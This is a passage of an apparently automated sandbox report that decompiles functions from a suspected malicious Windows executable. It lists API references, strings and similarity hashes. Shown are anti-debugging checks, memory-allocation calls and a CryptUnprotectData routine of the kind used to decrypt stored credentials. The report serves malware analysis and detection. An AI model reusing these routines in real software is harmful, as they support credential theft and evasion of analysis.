					_t54 = _t54 + 1;
					_t69 = _t54 - 0x48e01;
				} while (_t54 <= 0x48e01);
				E00E81720(_t69);
				exit(0);
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				_push(_t42);
				E00E81BA0(_t42,  *_t60);
				return _t42;
			}

APIs

srand.API-MS-WIN-CRT-UTILITY-L1-1-0(1DCDAD44,?,kernel32.dll,VirtualAllocEx,VirtualAlloc), ref: 00E81815
exit.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000,00E86018), ref: 00E8183C

Strings

kernel32.dll, xrefs: 00E81761
VirtualAllocEx, xrefs: 00E81753
VirtualAlloc, xrefs: 00E81745

Memory Dump Source

Source File: 00000002.00000002.245596346.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000002.00000002.245586506.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.245602228.0000000000E84000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.245613917.0000000000E86000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.245696548.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_e80000_file.jbxd

Similarity

API ID: exitsrand
String ID: VirtualAlloc$VirtualAllocEx$kernel32.dll
API String ID: 2250616054-2218080963
Opcode ID: 6cab202bd1159e84b9245dd0ce690958ffe01df928ac6dacd3f7f22dc52d400b
Instruction ID: 604e16848b230fdb39dc7cb5e30f7c75cda04e1e2fe8194169ec4390c6bf0069
Opcode Fuzzy Hash: 6cab202bd1159e84b9245dd0ce690958ffe01df928ac6dacd3f7f22dc52d400b
Instruction Fuzzy Hash: DD21D5714052508FC309FB64CD829AEB7E9AF52B80F086AEDF04E77162DF31580B8796

Uniqueness

Uniqueness Score: -1.00%

Function 0042C0D6 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 54
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E0042C0D6(void* __edi, char* __esi) {
				short _v8;
				void* _t24;

				_t24 = __edi;
				if(__esi == 0 ||  *__esi == 0 || E0041F730(__esi, ?str?) == 0) {
					if(GetLocaleInfoW( *(_t24 + 0x1c), 0x20001004,  &_v8, 2) != 0) {
						if(_v8 != 0) {
							goto L5;
						} else {
							return GetACP();
						}
					} else {
						goto L8;
					}
				} else {
					if(E0041F730(__esi, ?str?) != 0) {
						_v8 = E00421ECD(__esi);
						goto L5;
					} else {
						if(GetLocaleInfoW( *(__edi + 0x1c), 0x2000000b,  &_v8, 2) == 0) {
							L8:
							return 0;
						} else {
							L5:
							return _v8;
						}
					}
				}
			}

0x0042c0d6
0x0042c0de
0x0042c146
0x0042c150
0x00000000
0x0042c152
0x0042c159
0x0042c159
0x00000000
0x00000000
0x00000000
0x0042c0f6
0x0042c105
0x0042c12b
0x00000000
0x0042c107
0x0042c11d
0x0042c148
0x0042c14b
0x0042c11f
0x0042c11f
0x0042c123
0x0042c123
0x0042c11d
0x0042c105

APIs

GetLocaleInfoW.KERNEL32(?,2000000B,00000000,00000002,?,?,0042C713,?,00423CC5,?,000000BC,?,00000001,00000000,00000000), ref: 0042C115
GetLocaleInfoW.KERNEL32(?,20001004,00000000,00000002,?,?,0042C713,?,00423CC5,?,000000BC,?,00000001,00000000,00000000), ref: 0042C13E
GetACP.KERNEL32(?,?,0042C713,?,00423CC5,?,000000BC,?,00000001,00000000), ref: 0042C152

Strings

OCP, xrefs: 0042C0F6
ACP, xrefs: 0042C0E5

Memory Dump Source

Source File: 00000002.00000002.244915415.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.245003002.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_file.jbxd

Yara matches

Similarity

API ID: InfoLocale
String ID: ACP$OCP
API String ID: 2299586839-711371036
Opcode ID: 97097ea53d2d6a6f5c6d7210f5ddbd2e81998f71307567cb9d072f396220fadf
Instruction ID: 369710d9ef41a06eea0a041bfac500a06be853283335cfbef68a99204104ab5d
Opcode Fuzzy Hash: 97097ea53d2d6a6f5c6d7210f5ddbd2e81998f71307567cb9d072f396220fadf
Instruction Fuzzy Hash: 6201FC30701626BAEB219B50FC87F6F76E8AF0435CF60002BF141E21C2DB68DA518A9D

Uniqueness

Uniqueness Score: -1.00%

Function 0041F69E Relevance: 7.6, APIs: 5, Instructions: 58
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 85%

			E0041F69E(intOrPtr __eax, intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, char _a4) {
				intOrPtr _v0;
				void* _v804;
				intOrPtr _v808;
				intOrPtr _v812;
				intOrPtr _t6;
				intOrPtr _t11;
				intOrPtr _t12;
				intOrPtr _t13;
				long _t17;
				intOrPtr _t21;
				intOrPtr _t22;
				intOrPtr _t25;
				intOrPtr _t26;
				intOrPtr _t27;
				intOrPtr* _t31;
				void* _t34;

				_t27 = __esi;
				_t26 = __edi;
				_t25 = __edx;
				_t22 = __ecx;
				_t21 = __ebx;
				_t6 = __eax;
				_t34 = _t22 -  *0x444664; // 0xfa3a0753
				if(_t34 == 0) {
					asm("repe ret");
				}
				 *0x445dc8 = _t6;
				 *0x445dc4 = _t22;
				 *0x445dc0 = _t25;
				 *0x445dbc = _t21;
				 *0x445db8 = _t27;
				 *0x445db4 = _t26;
				 *0x445de0 = ss;
				 *0x445dd4 = cs;
				 *0x445db0 = ds;
				 *0x445dac = es;
				 *0x445da8 = fs;
				 *0x445da4 = gs;
				asm("pushfd");
				_pop( *0x445dd8);
				 *0x445dcc =  *_t31;
				 *0x445dd0 = _v0;
				 *0x445ddc =  &_a4;
				 *0x445d18 = 0x10001;
				_t11 =  *0x445dd0; // 0x0
				 *0x445ccc = _t11;
				 *0x445cc0 = 0xc0000409;
				 *0x445cc4 = 1;
				_t12 =  *0x444664; // 0xfa3a0753
				_v812 = _t12;
				_t13 =  *0x444668; // 0x5c5f8ac
				_v808 = _t13;
				 *0x445d10 = IsDebuggerPresent();
				_push(1);
				E0042D5A5(_t14);
				SetUnhandledExceptionFilter(0);
				_t17 = UnhandledExceptionFilter(0x435d68);
				if( *0x445d10 == 0) {
					_push(1);
					E0042D5A5(_t17);
				}
				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
			}

0x0041f69e
0x0041f69e
0x0041f69e
0x0041f69e
0x0041f69e
0x0041f69e
0x0041f69e
0x0041f6a4
0x0041f6a6
0x0041f6a6
0x00425daa
0x00425daf
0x00425db5
0x00425dbb
0x00425dc1
0x00425dc7
0x00425dcd
0x00425dd4
0x00425ddb
0x00425de2
0x00425de9
0x00425df0
0x00425df7
0x00425df8
0x00425e01
0x00425e09
0x00425e11
0x00425e1c
0x00425e26
0x00425e2b
0x00425e30
0x00425e3a
0x00425e44
0x00425e49
0x00425e4f
0x00425e54
0x00425e60
0x00425e65
0x00425e67
0x00425e6f
0x00425e7a
0x00425e87
0x00425e89
0x00425e8b
0x00425e90
0x00425ea4

APIs

IsDebuggerPresent.KERNEL32 ref: 00425E5A
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00425E6F
UnhandledExceptionFilter.KERNEL32(00435D68), ref: 00425E7A
GetCurrentProcess.KERNEL32(C0000409), ref: 00425E96
TerminateProcess.KERNEL32(00000000), ref: 00425E9D

Memory Dump Source

Source File: 00000002.00000002.244915415.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.245003002.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_file.jbxd

Yara matches

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
String ID:
API String ID: 2579439406-0
Opcode ID: 8fadb72411547aaffbfd3eee417f27571ea3aa1bb630b94a0af4f41445ccf86f
Instruction ID: caca3c3a600d071116d4a75da1b4b46d1b50a4f0800094bf3656c26cfd9db66c
Opcode Fuzzy Hash: 8fadb72411547aaffbfd3eee417f27571ea3aa1bb630b94a0af4f41445ccf86f
Instruction Fuzzy Hash: C921CEB8901B049FDB45EF24FD89A483BB0BF8A305F90903AE50887372E7B459858F4D

Uniqueness

Uniqueness Score: -1.00%

Function 0040FA24 Relevance: 7.6, APIs: 5, Instructions: 51
encryptionCOMMON

Download Yara Rule

C-Code - Quality: 31%

			E0040FA24(char __eax, intOrPtr __ecx, void* __eflags) {
				intOrPtr _v8;
				char _v12;
				intOrPtr _v16;
				char _v20;
				void* __edi;
				void* __esi;
				void* _t21;
				intOrPtr _t22;
				intOrPtr _t23;
				char _t24;
				void* _t25;

				_t24 = __eax;
				_t22 = __ecx;
				E0041F8C0(E0041FC5B(_t21, __ecx, __eax, __eax), __ecx, __eax);
				_v8 = _t22;
				_v12 = _t24;
				_t25 = E0041FC5B(_t21, _t22, _t24, _t24);
				_push( &_v20);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push( &_v12);
				if( *0x4473e8() == 0) {
					return 0;
				}
				_t23 = _v20;
				if(_t23 > 0) {
					E0041F8C0(_t25, _v16, _t23);
				}
				 *((char*)(_t23 + _t25)) = 0;
				return _t25;
			}

0x0040fa2d
0x0040fa2f
0x0040fa3b
0x0040fa41
0x0040fa44
0x0040fa4f
0x0040fa56
0x0040fa57
0x0040fa58
0x0040fa59
0x0040fa5a
0x0040fa5b
0x0040fa5f
0x0040fa68
0x00000000
0x0040fa85
0x0040fa6a
0x0040fa6f
0x0040fa76
0x0040fa7b
0x0040fa7e
0x00000000

APIs

_malloc.LIBCMT ref: 0040FA34

Part of subcall function 0041FC5B: __FF_MSGBANNER.LIBCMT ref: 0041FC74
Part of subcall function 0041FC5B: __NMSG_WRITE.LIBCMT ref: 0041FC7B
Part of subcall function 0041FC5B: RtlAllocateHeap.NTDLL(00000000,00000001,00000000,000003E8,00000400,?,00420486,0040B965,?,?,0040B965,00000400,?,00000000,000003E8), ref: 0041FCA0

_memmove.LIBCMT ref: 0040FA3B
_malloc.LIBCMT ref: 0040FA47
CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,0040918B), ref: 0040FA60
_memmove.LIBCMT ref: 0040FA76

Memory Dump Source

Source File: 00000002.00000002.244915415.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.245003002.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_file.jbxd

Yara matches

Similarity

API ID: _malloc_memmove$AllocateCryptDataHeapUnprotect
String ID:
API String ID: 2315474888-0
Opcode ID: 3c4196daec8a0007b1ef32a6761955e340465f059f6cdfda28897ca323611b1d
Instruction ID: 25dc575aff8610ff60bd6ca122c6210ceaab3e74829cd07b11a8879226a63fad
Opcode Fuzzy Hash: 3c4196daec8a0007b1ef32a6761955e340465f059f6cdfda28897ca323611b1d
Instruction Fuzzy Hash: 85F0C873E001187BD711AAE98C45CEFBB6CDD41754754047BF804E3241F674994A86E9

Uniqueness

Uniqueness Score: -1.00%

Function 0040F78C Relevance: 6.0, APIs: 4, Instructions: 42
encryptionmemoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040F78C(void** __ebx, void* __ecx, DWORD* __edi, char* _a4) {
				int _v8;
				BYTE* _t8;
				int _t9;

				 *__ebx = 0;
				_v8 = 0;
				 *__edi = 0;
				if(CryptStringToBinaryA(_a4, 0, 1, 0, __edi, 0, 0) != 0) {
					_t8 = LocalAlloc(0x40,  *__edi);
					 *__ebx = _t8;
					if(_t8 != 0) {
						_t9 = CryptStringToBinaryA(_a4, 0, 1, _t8, __edi, 0, 0);
						_v8 = _t9;
						if(_t9 == 0) {
							 *__ebx = LocalFree( *__ebx);
						}
					}
				}
				return _v8;
			}

0x0040f79d
0x0040f79f
0x0040f7a2
0x0040f7ac
0x0040f7b2
0x0040f7b8
0x0040f7bc
0x0040f7c8
0x0040f7ce
0x0040f7d3
0x0040f7dd
0x0040f7dd
0x0040f7d3
0x0040f7bc
0x0040f7e4

APIs

CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 0040F7A4
LocalAlloc.KERNEL32(00000040,?,?,?,0040F9B7,?,?,0043F728,00000000,-00000010,?,?,?,0040939F,?,?), ref: 0040F7B2
CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 0040F7C8
LocalFree.KERNEL32(?,?,?,0040F9B7,?,?,0043F728,00000000,-00000010,?,?,?,0040939F,?,?), ref: 0040F7D7

Memory Dump Source

Source File: 00000002.00000002.244915415.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.245003002.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_file.jbxd

Yara matches

Similarity

API ID: BinaryCryptLocalString$AllocFree
String ID:
API String ID: 4291131564-0
Opcode ID: 25836ede49b05b37b6086b1fea667c55b7631b549736ed12a7531b0c4d3c7aac
Instruction ID: a605378fccf133ec58571adcb7f18b471c16a4ef206e6f06f10069be19cf9040
Opcode Fuzzy Hash: 25836ede49b05b37b6086b1fea667c55b7631b549736ed12a7531b0c4d3c7aac
Instruction Fuzzy Hash: 82F0E774111234BFCB315F56CC8DEDB7EBCEF06BA0F100466F809A6664E3754950DAA5

Uniqueness

Uniqueness Score: -1.00%

Function 004217D4 Relevance: .4, Instructions: 355COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.244915415.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.245003002.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f02dcea883d10451d84a59732baab65edb0b568fbd8ca007beb23fa60eef1400
Instruction ID: d64bff9d9da6c221513bc85b7e36297e4a0b176f8d00001f75f1a53813af4008
Opcode Fuzzy Hash: f02dcea883d10451d84a59732baab65edb0b568fbd8ca007beb23fa60eef1400
Instruction Fuzzy Hash: 02C1A773E0B5F2058735452E145823FEEA26EA2B8035FC3D6DCD03F2A9C62A6D15D5D8

Uniqueness

Uniqueness Score: -1.00%

Function 004213EC Relevance: .3, Instructions: 349COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.244915415.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.245003002.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0c69e47d847606dd43a020a10b245ffd8c98205713db3c8f796c6159738d0b06
Instruction ID: fcbef29a67c1aa52b5c1e0e632cfe7c9c9535b17ee60a922b6595d33d06e59fd
Opcode Fuzzy Hash: 0c69e47d847606dd43a020a10b245ffd8c98205713db3c8f796c6159738d0b06
Instruction Fuzzy Hash: D1C19673E0A5F2058735452E641823FEEA26EA2B8135FC3D2DCD03F3A9C62A6D45D5D8

Uniqueness

Uniqueness Score: -1.00%

Function 00406050 Relevance: .3, Instructions: 339COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.244915415.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.245003002.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 039ff6052f0ce41e0a6d7af676c3c7402862770ec66b9bff62dd3f6514cc13e5
Instruction ID: f98282a04965c5c6b79f47022c8dae1faedd80ac6c47330fff322a9ec1e8e377
Opcode Fuzzy Hash: 039ff6052f0ce41e0a6d7af676c3c7402862770ec66b9bff62dd3f6514cc13e5
Instruction Fuzzy Hash: 94F1C871E002298FDF24CF28C99079DB7B2BB49314F1681EAC94AB7285D7306E95CF95

Uniqueness

Uniqueness Score: -1.00%

Function 0042101A Relevance: .3, Instructions: 332COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.244915415.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.245003002.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 21018234ac6c65dce347e9eb3c09d9e563dc327998c84d170fb29f747537f1fa
Instruction ID: 3ca48b657b86f851aff4e87e8bf2f1e8fb2447fa94bdcb4834b7f37cc2e117ab
Opcode Fuzzy Hash: 21018234ac6c65dce347e9eb3c09d9e563dc327998c84d170fb29f747537f1fa
Instruction Fuzzy Hash: C0C19673E0E5B2458B35452E241423FEEA26E92B8035FC3D2DCD03F7AAC62A6D15D5D8

Uniqueness

Uniqueness Score: -1.00%

Function 00420C7C Relevance: .3, Instructions: 326COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.244915415.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.245003002.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 21b74c51e355f1ada917146b454bba93dbff062365e48e41ecc74cc68dac6f4d
Instruction ID: 4012707604706f208acbae17eadf42bf0cf63937accdb2f2de6954e778cd88d8
Opcode Fuzzy Hash: 21b74c51e355f1ada917146b454bba93dbff062365e48e41ecc74cc68dac6f4d
Instruction Fuzzy Hash: 93B19473E5B4B2058735452E251823FEEE26E92B8135FC3D2DCD03F29AC62A6D0595D8

Uniqueness

Uniqueness Score: -1.00%

Function 0041B5A7 Relevance: .2, Instructions: 191COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.244915415.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.245003002.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2da0d21d2f703490c46773c4d5945909d89d9cd5708c87f9d00aac82c972da20
Instruction ID: e2425cd035fd36436605516082cbafdd7ccdf67b4bb734115d5dd857ff143775
Opcode Fuzzy Hash: 2da0d21d2f703490c46773c4d5945909d89d9cd5708c87f9d00aac82c972da20
Instruction Fuzzy Hash: 1761E272A40705DBD728CF69D8817EAB3B1EF98314F20857ED15A972C0DB746A86C748

Uniqueness

Uniqueness Score: -1.00%

Function 00421E20 Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.244915415.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.245003002.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
Instruction ID: 9b475df366ff242d6df6b51cea85c88897695d1a6c0300e061f2a1cb3ea165b9
Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
Instruction Fuzzy Hash: C311E9773001A143E624862DFCB46B7B395EBF53217EF4367D8424B774D12A99469508

Uniqueness

Uniqueness Score: -1.00%

Function 004069EB Relevance: .1, Instructions: 74COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.244915415.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.245003002.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: afbdb44ede013947aaac443656b9d5b48011b8a8103086cc7c0da5f0551c0333
Instruction ID: e020df2fae8bfcf67d335d589ae70f275f78068ab220164d8f228747457df653
Opcode Fuzzy Hash: afbdb44ede013947aaac443656b9d5b48011b8a8103086cc7c0da5f0551c0333
Instruction Fuzzy Hash: C621D522AB4AE206C7448BFAFCC121727D1CBCA21735ED676CE50DA1E5C07D96228964

Uniqueness

Uniqueness Score: -1.00%

Function 0041D766 Relevance: .1, Instructions: 74COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.244915415.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.245003002.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b748bcea20ffc0107d2eb0d697196f28973ff0108d97458884ea46b989ae338a
Instruction ID: 29b1ff6dd675183624949dcf5861259b59193ff89da482822666568d13ffbb64
Opcode Fuzzy Hash: b748bcea20ffc0107d2eb0d697196f28973ff0108d97458884ea46b989ae338a
Instruction Fuzzy Hash: 1A21BB31EB0AE206C7858FF8FCC019267D1CBCE22639D9275CE64C9161D06EDA72C664

Uniqueness

Uniqueness Score: -1.00%

Function 0041286C Relevance: 78.3, APIs: 52, Instructions: 347
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E0041286C(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t120;
				int _t141;
				void* _t146;
				intOrPtr* _t149;
				void* _t157;
				void* _t167;
				void* _t170;
				void* _t174;
				void* _t182;
				long _t210;
				void* _t227;
				void* _t244;
				void* _t245;
				void* _t246;
				void* _t247;
				void* _t248;
				void* _t249;
				void* _t250;
				void* _t251;

				_t251 = __eflags;
				_push(0x98);
				E00423679(E0043371A, __ebx, __edi, __esi);
				 *(_t244 - 0x8c) =  *(_t244 + 8);
				 *((intOrPtr*)(_t244 - 0xa4)) =  *((intOrPtr*)(_t244 + 0xc));
				_t210 = 0;
				 *((intOrPtr*)(_t244 - 0x98)) =  *((intOrPtr*)(_t244 + 0x10));
				_t120 = 0xf;
				 *(_t244 - 0xa0) = 0;
				 *(_t244 - 0x84) = 0;
				 *(_t244 - 0x88) = 0;
				 *((intOrPtr*)(_t244 - 0x18)) = _t120;
				 *((intOrPtr*)(_t244 - 0x1c)) = 0;
				 *(_t244 - 0x2c) = 0;
				 *((intOrPtr*)(_t244 - 4)) = 0;
				 *((intOrPtr*)(_t244 - 0x34)) = _t120;
				 *((intOrPtr*)(_t244 - 0x38)) = 0;
				 *((char*)(_t244 - 0x48)) = 0;
				_push(_t244 - 0x88);
				_push(__ecx);
				 *((char*)(_t244 - 4)) = 1;
				_t234 = E0041276B(0, _t244 - 0x84, __edi, __esi, _t251);
				 *(_t244 - 0xa0) = _t234;
				_t239 = HeapAlloc(GetProcessHeap(), 8,  *(_t244 - 0x88));
				if(_t239 != 0) {
					E004203AC(_t239,  *(_t244 - 0x88),  *(_t244 - 0x84));
					_t246 = _t245 + 0xc;
					__eflags =  *(_t244 - 0x84);
					if( *(_t244 - 0x84) != 0) {
						HeapFree(GetProcessHeap(), 0,  *(_t244 - 0x84));
						 *(_t244 - 0x84) = 0;
					}
					__eflags = _t234 - 0xff;
					if(__eflags != 0) {
						 *(_t244 - 0x94) = _t234;
						goto L15;
					} else {
						_push(_t244 - 0x88);
						_push(_t239);
						E0041276B(_t210, _t244 - 0x84, _t234, _t239, __eflags);
						HeapFree(GetProcessHeap(), _t210, _t239);
						_t239 = HeapAlloc(GetProcessHeap(), 8,  *(_t244 - 0x88));
						__eflags = _t239 - _t210;
						if(_t239 == _t210) {
							goto L1;
						}
						E004203AC(_t239,  *(_t244 - 0x88),  *(_t244 - 0x84));
						_t250 = _t246 + 0xc;
						__eflags =  *(_t244 - 0x84) - _t210;
						if(__eflags != 0) {
							HeapFree(GetProcessHeap(), _t210,  *(_t244 - 0x84));
							 *(_t244 - 0x84) = _t210;
						}
						_push(_t244 - 0x88);
						_push(_t239);
						 *(_t244 - 0x94) = E0041276B(_t210, _t244 - 0x84, _t234, _t239, __eflags);
						HeapFree(GetProcessHeap(), _t210, _t239);
						_t239 = HeapAlloc(GetProcessHeap(), 8,  *(_t244 - 0x88));
						__eflags = _t239 - _t210;
						if(_t239 == _t210) {
							goto L1;
						} else {
							E004203AC(_t239,  *(_t244 - 0x88),  *(_t244 - 0x84));
							_t246 = _t250 + 0xc;
							__eflags =  *(_t244 - 0x84) - _t210;
							if(__eflags != 0) {
								HeapFree(GetProcessHeap(), _t210,  *(_t244 - 0x84));
								 *(_t244 - 0x84) = _t210;
							}
							L15:
							_push(_t244 - 0x88);
							_push(_t239);
							 *((intOrPtr*)(_t244 - 0x9c)) = E0041276B(_t210, _t244 - 0x84, _t234, _t239, __eflags) + _t127;
							HeapFree(GetProcessHeap(), _t210, _t239);
							_t239 = HeapAlloc(GetProcessHeap(), 8,  *(_t244 - 0x88));
							 *(_t244 - 0x90) = _t239;
							__eflags = _t239 - _t210;
							if(_t239 == _t210) {
								goto L1;
							}
							E004203AC(_t239,  *(_t244 - 0x88),  *(_t244 - 0x84));
							_t247 = _t246 + 0xc;
							__eflags =  *(_t244 - 0x84) - _t210;
							if( *(_t244 - 0x84) != _t210) {
								HeapFree(GetProcessHeap(), _t210,  *(_t244 - 0x84));
							}
							_t141 = lstrlenA(_t239);
							_t234 = _t141 + 1 -  *((intOrPtr*)(_t244 - 0x9c));
							_t146 = HeapAlloc(GetProcessHeap(), 8, _t141 + 1 -  *((intOrPtr*)(_t244 - 0x9c)));
							 *(_t244 - 0x84) = _t146;
							__eflags = _t146 - _t210;
							if(_t146 == _t210) {
								L4:
								E004049CF( *(_t244 - 0x8c), 0x43d12c);
								E00404A66(_t244 - 0x48, 1, _t210);
								E00404A66(_t244 - 0x2c, 1, _t210);
								goto L30;
							} else {
								 *(_t244 - 0x88) = E004049CF(_t244 - 0x64, _t239);
								 *((char*)(_t244 - 4)) = 2;
								_t149 = E0040CD3B(_t244 - 0x64, _t244 - 0x80,  *(_t244 - 0x88),  *((intOrPtr*)(_t244 - 0x9c)), lstrlenA(_t239));
								__eflags =  *((intOrPtr*)(_t149 + 0x14)) - 0x10;
								if( *((intOrPtr*)(_t149 + 0x14)) >= 0x10) {
									_t149 =  *_t149;
								}
								_t234 =  *(_t244 - 0x84);
								E004203AC(_t234, _t234, _t149);
								_t248 = _t247 + 0xc;
								E00404A66(_t244 - 0x80, 1, _t210);
								 *((char*)(_t244 - 4)) = 1;
								E00404A66(_t244 - 0x64, 1, _t210);
								HeapFree(GetProcessHeap(), _t210,  *(_t244 - 0x90));
								_t74 = lstrlenA(_t234) + 1; // 0x1
								_t239 = _t74;
								 *(_t244 - 0x88) = _t239;
								_t157 = HeapAlloc(GetProcessHeap(), 8, _t239);
								 *(_t244 - 0x90) = _t157;
								_push(_t234);
								__eflags = _t157 - _t210;
								if(_t157 == _t210) {
									L3:
									HeapFree(GetProcessHeap(), _t210, ??);
									goto L4;
								} else {
									_push(_t239);
									_push(_t157);
									E004203AC();
									_t249 = _t248 + 0xc;
									HeapFree(GetProcessHeap(), _t210, _t234);
									_t234 = 0;
									 *(_t244 - 0x84) = _t210;
									__eflags =  *(_t244 - 0x94) - _t210;
									if(__eflags <= 0) {
										L27:
										__eflags =  *(_t244 - 0xa0) - 0xff;
										if( *(_t244 - 0xa0) == 0xff) {
											_t167 = E004049CF(_t244 - 0x64,  *((intOrPtr*)(_t244 - 0xa4)));
											 *((char*)(_t244 - 4)) = 3;
											E00404A22(_t244 - 0x48, _t167);
											 *((char*)(_t244 - 4)) = 1;
											E00404A66(_t244 - 0x64, 1, _t210);
											_t170 = E004201E0( *((intOrPtr*)(_t244 - 0x98)));
											_pop(_t227);
											E0040CFD5(_t244 - 0x48, _t170, __eflags,  *((intOrPtr*)(_t244 - 0x98)));
											_t174 = E0040CD3B(_t227, _t244 - 0x64, _t244 - 0x2c,  *((intOrPtr*)(_t244 - 0x38)),  *((intOrPtr*)(_t244 - 0x1c)));
											 *((char*)(_t244 - 4)) = 4;
											E00404A22(_t244 - 0x2c, _t174);
											 *((char*)(_t244 - 4)) = 1;
											E00404A66(_t244 - 0x64, 1, 0);
											_t210 = 0;
											__eflags = 0;
										}
										HeapFree(GetProcessHeap(), _t210,  *(_t244 - 0x90));
										_t234 =  *(_t244 - 0x8c);
										 *((intOrPtr*)(_t234 + 0x14)) = 0xf;
										 *(_t234 + 0x10) = _t210;
										_t239 = _t244 - 0x2c;
										 *_t234 = _t210;
										E00404A22(_t234, _t244 - 0x2c);
										E00404A66(_t244 - 0x48, 1, _t210);
										E00404A66(_t244 - 0x2c, 1, _t210);
										L30:
